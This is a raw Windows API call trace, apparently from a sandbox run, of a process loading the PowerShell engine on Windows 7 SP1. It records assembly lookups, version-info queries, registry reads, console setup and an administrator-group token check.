	[0701.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0701.533] SetErrorMode (uMode=0x1) returned 0x1
	[0701.534] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16dd80 | out: lpFileInformation=0x16dd80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0701.534] SetErrorMode (uMode=0x1) returned 0x1
	[0701.534] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16dff0 | out: lpdwHandle=0x16dff0) returned 0x94c
	[0703.611] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2baa8f8 | out: lpData=0x2baa8f8) returned 1
	[0703.612] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x2baa994, puLen=0x16df60) returned 1
	[0703.612] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2baaa70, puLen=0x16ded0) returned 1
	[0703.612] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0703.612] CoTaskMemAlloc (cb=0x2e) returned 0x2a3400
	[0703.612] lstrcpyW (in: lpString1=0x2a3400, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0703.612] CoTaskMemFree (pv=0x2a3400) 
	[0703.612] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2baaac4, puLen=0x16ded0) returned 1
	[0703.612] lstrlenW (lpString="System.Management.Automation") returned 28
	[0703.613] CoTaskMemAlloc (cb=0x3c) returned 0x21b0d0
	[0703.613] lstrcpyW (in: lpString1=0x21b0d0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0703.613] CoTaskMemFree (pv=0x21b0d0) 
	[0703.613] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2baab20, puLen=0x16ded0) returned 1
	[0703.613] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0703.613] CoTaskMemAlloc (cb=0x20) returned 0x2a7b30
	[0703.613] lstrcpyW (in: lpString1=0x2a7b30, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0703.613] CoTaskMemFree (pv=0x2a7b30) 
	[0703.613] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2baab60, puLen=0x16ded0) returned 1
	[0703.613] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0703.613] CoTaskMemAlloc (cb=0x44) returned 0x21b0d0
	[0703.613] lstrcpyW (in: lpString1=0x21b0d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0703.613] CoTaskMemFree (pv=0x21b0d0) 
	[0703.613] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2baabc8, puLen=0x16ded0) returned 1
	[0703.613] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0703.613] CoTaskMemAlloc (cb=0x76) returned 0x2413c0
	[0703.613] lstrcpyW (in: lpString1=0x2413c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0703.613] CoTaskMemFree (pv=0x2413c0) 
	[0703.614] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2baac64, puLen=0x16ded0) returned 1
	[0703.614] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0703.614] CoTaskMemAlloc (cb=0x44) returned 0x21b0d0
	[0703.614] lstrcpyW (in: lpString1=0x21b0d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0703.614] CoTaskMemFree (pv=0x21b0d0) 
	[0703.614] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2baacc8, puLen=0x16ded0) returned 1
	[0703.614] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0703.614] CoTaskMemAlloc (cb=0x58) returned 0x1f6a50
	[0703.614] lstrcpyW (in: lpString1=0x1f6a50, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0703.614] CoTaskMemFree (pv=0x1f6a50) 
	[0703.614] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2baad44, puLen=0x16ded0) returned 1
	[0703.614] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0703.614] CoTaskMemAlloc (cb=0x20) returned 0x2a7b30
	[0703.614] lstrcpyW (in: lpString1=0x2a7b30, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0703.614] CoTaskMemFree (pv=0x2a7b30) 
	[0703.614] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2baa9ec, puLen=0x16ded0) returned 1
	[0703.614] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0703.614] CoTaskMemAlloc (cb=0x66) returned 0x2a6cb0
	[0703.614] lstrcpyW (in: lpString1=0x2a6cb0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0703.615] CoTaskMemFree (pv=0x2a6cb0) 
	[0703.615] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x0, puLen=0x16ded0) returned 0
	[0703.615] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x0, puLen=0x16ded0) returned 0
	[0703.615] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x0, puLen=0x16ded0) returned 0
	[0703.615] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dea8, puLen=0x16dea0 | out: lplpBuffer=0x16dea8*=0x2baa994, puLen=0x16dea0) returned 1
	[0703.615] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0703.615] VerLanguageNameW (in: wLang=0x0, szLang=0x25aca0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0703.615] CoTaskMemFree (pv=0x25aca0) 
	[0703.615] VerQueryValueW (in: pBlock=0x2baa8f8, lpSubBlock="\\", lplpBuffer=0x16def8, puLen=0x16def0 | out: lplpBuffer=0x16def8*=0x2baa920, puLen=0x16def0) returned 1
	[0703.624] CoTaskMemAlloc (cb=0x104) returned 0x1f3180
	[0703.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0703.624] CoTaskMemFree (pv=0x1f3180) 
	[0703.632] CoTaskMemAlloc (cb=0x104) returned 0x1f3180
	[0703.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0703.632] CoTaskMemFree (pv=0x1f3180) 
	[0703.636] lstrlenW (lpString="䅁") returned 1
	[0703.646] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16ddc8 | out: phkResult=0x16ddc8*=0x2e4) returned 0x0
	[0703.651] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x16ddb8 | out: phkResult=0x16ddb8*=0x2e8) returned 0x0
	[0703.651] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16de48 | out: phkResult=0x16de48*=0x2ec) returned 0x0
	[0703.656] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dd8c, lpData=0x0, lpcbData=0x16dd88*=0x0 | out: lpType=0x16dd8c*=0x1, lpData=0x0, lpcbData=0x16dd88*=0x56) returned 0x0
	[0705.437] CoTaskMemAlloc (cb=0x5a) returned 0x2a6c40
	[0705.437] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dd5c, lpData=0x2a6c40, lpcbData=0x16dd58*=0x56 | out: lpType=0x16dd5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dd58*=0x56) returned 0x0
	[0705.437] CoTaskMemFree (pv=0x2a6c40) 
	[0705.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0705.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0705.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0705.468] CoTaskMemAlloc (cb=0x104) returned 0x1f3180
	[0705.468] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0705.469] CoTaskMemFree (pv=0x1f3180) 
	[0718.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0718.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0723.283] CoTaskMemAlloc (cb=0x104) returned 0x1f3180
	[0723.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.283] CoTaskMemFree (pv=0x1f3180) 
	[0723.285] CoTaskMemAlloc (cb=0x104) returned 0x2b4800
	[0723.286] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.286] CoTaskMemFree (pv=0x2b4800) 
	[0724.733] CoTaskMemAlloc (cb=0x104) returned 0x2b4800
	[0724.734] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.734] CoTaskMemFree (pv=0x2b4800) 
	[0724.735] CoTaskMemAlloc (cb=0x104) returned 0x2b4800
	[0724.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.736] CoTaskMemFree (pv=0x2b4800) 
	[0724.736] CoTaskMemAlloc (cb=0x104) returned 0x2b4800
	[0724.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.736] CoTaskMemFree (pv=0x2b4800) 
	[0729.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0729.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0731.844] CoTaskMemAlloc (cb=0x104) returned 0x2b4800
	[0731.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.844] CoTaskMemFree (pv=0x2b4800) 
	[0731.846] CoTaskMemAlloc (cb=0x104) returned 0x2b4800
	[0731.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4800, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.846] CoTaskMemFree (pv=0x2b4800) 
	[0733.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0733.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0746.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0746.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0753.202] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0753.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.202] CoTaskMemFree (pv=0x2b4a20) 
	[0753.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0753.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16dad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0753.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16dad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0753.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16dad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0755.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x16daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0755.543] SetErrorMode (uMode=0x1) returned 0x1
	[0755.543] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x16dd20 | out: lpFileInformation=0x16dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0755.543] SetErrorMode (uMode=0x1) returned 0x1
	[0765.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0765.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16dad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0765.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16dad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0765.704] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0765.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.705] CoTaskMemFree (pv=0x2b4a20) 
	[0765.708] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0765.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.708] CoTaskMemFree (pv=0x2b4a20) 
	[0765.708] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0765.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.708] CoTaskMemFree (pv=0x2b4a20) 
	[0765.711] CoCreateGuid (in: pguid=0x16e0e8 | out: pguid=0x16e0e8*(Data1=0xe92bf406, Data2=0x5637, Data3=0x43fa, Data4=([0]=0xa2, [1]=0x0, [2]=0xd7, [3]=0x43, [4]=0xd1, [5]=0xd7, [6]=0xfa, [7]=0x52))) returned 0x0
	[0767.868] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0767.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0767.868] CoTaskMemFree (pv=0x2b4a20) 
	[0767.871] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0767.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0767.872] CoTaskMemFree (pv=0x2b4a20) 
	[0767.874] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0767.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0767.874] CoTaskMemFree (pv=0x2b4a20) 
	[0767.898] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0769.163] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x16dd90 | out: lpConsoleScreenBufferInfo=0x16dd90) returned 1
	[0769.188] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0769.188] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16dd90 | out: lpConsoleScreenBufferInfo=0x16dd90) returned 1
	[0769.189] GetVersionExW (in: lpVersionInformation=0x16dd20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dd20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0769.192] GetCurrentProcess () returned 0xffffffffffffffff
	[0769.193] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16ddb8 | out: TokenHandle=0x16ddb8*=0x300) returned 1
	[0769.200] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dcd8 | out: TokenInformation=0x0, ReturnLength=0x16dcd8) returned 0
	[0769.201] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2072d0
	[0769.201] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x8, TokenInformation=0x2072d0, TokenInformationLength=0x4, ReturnLength=0x16dcd8 | out: TokenInformation=0x2072d0, ReturnLength=0x16dcd8) returned 1
	[0769.203] DuplicateTokenEx (in: hExistingToken=0x300, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x16de38 | out: phNewToken=0x16de38*=0x2fc) returned 1
	[0769.203] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dcd8 | out: TokenInformation=0x0, ReturnLength=0x16dcd8) returned 0
	[0769.203] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2072b0
	[0769.203] GetTokenInformation (in: TokenHandle=0x300, TokenInformationClass=0x8, TokenInformation=0x2072b0, TokenInformationLength=0x4, ReturnLength=0x16dcd8 | out: TokenInformation=0x2072b0, ReturnLength=0x16dcd8) returned 1
	[0769.204] CheckTokenMembership (in: TokenHandle=0x2fc, SidToCheck=0x2c856a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x16de48 | out: IsMember=0x16de48) returned 1
	[0769.204] CloseHandle (hObject=0x2fc) returned 1
